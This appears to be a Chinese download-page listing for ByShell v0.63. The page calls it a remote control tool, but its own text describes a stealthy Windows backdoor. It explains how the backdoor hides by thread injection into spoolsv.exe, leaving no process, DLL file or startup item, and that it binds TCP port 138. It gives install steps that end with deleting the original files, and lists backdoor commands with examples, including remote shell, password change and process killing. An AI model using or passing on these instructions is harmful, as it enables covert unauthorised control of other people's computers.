ByShell是一款功能强大的远程操控工具,支持用户在不同地点便捷地管理和控制设备。它提供了直观的操作界面和丰富的功能集,适用于各种技术环境。
byshell 0.64的网络传输稳定性较差,建议使用前一版本0.63。
如果遇到0.64无法正常使用的情况,请尝试使用此版本。
**byshell v0.63**
- **作者**: by
该软件为用户态实现无进程、无DLL文件及启动项的后门程序。它通过线程注入将DLL加载到系统进程中,并在关机时恢复原状。大量借鉴了农民前辈cmdbind2的思想,对此表示感谢。
此版本目前绑定于TCP138端口,未来计划改为无连接或端口复用的方式。
由于作者的编程风格问题,代码和注释可能显得较为混乱,请予以理解。
软件及其源代码允许自由传播,但使用时需注明原出处。未经许可不得用于商业用途(除学习和个人目的外)。
此工具仅支持NT及以上的Windows系统版本。首次使用时需要在服务端放置ntboot.exe与ntboot.dll在同一目录下,并执行命令`ntboot.exe -install`进行安装;安装完成后,可以删除原始文件。之后当服务器连接网络时,byshell将自动注入到spoolsv.exe进程中(可通过修改源码来改变目标进程)。
**主要功能如下:**
- `cmd`: 执行单条CMD指令。
示例: `#cmddir c:\winnt`
- `shell`: 进入交互式远程命令提示符模式,直到输入`endshell`返回主界面。
- `chpass`: 更改后门密码,默认为“by”。
示例: `#chpass123456`
- `byver`: 查看连接的客户端版本信息。不同版本间可能存在兼容性问题。
- `sysinfo`: 获取对方基本系统信息。
- `pslist`: 列出目标系统的进程列表。
- `pskill`: 结束指定PID的目标进程。
示例: `#pskill972`
- `modlist`: 显示特定PID的进程中加载的所有DLL文件。
5星
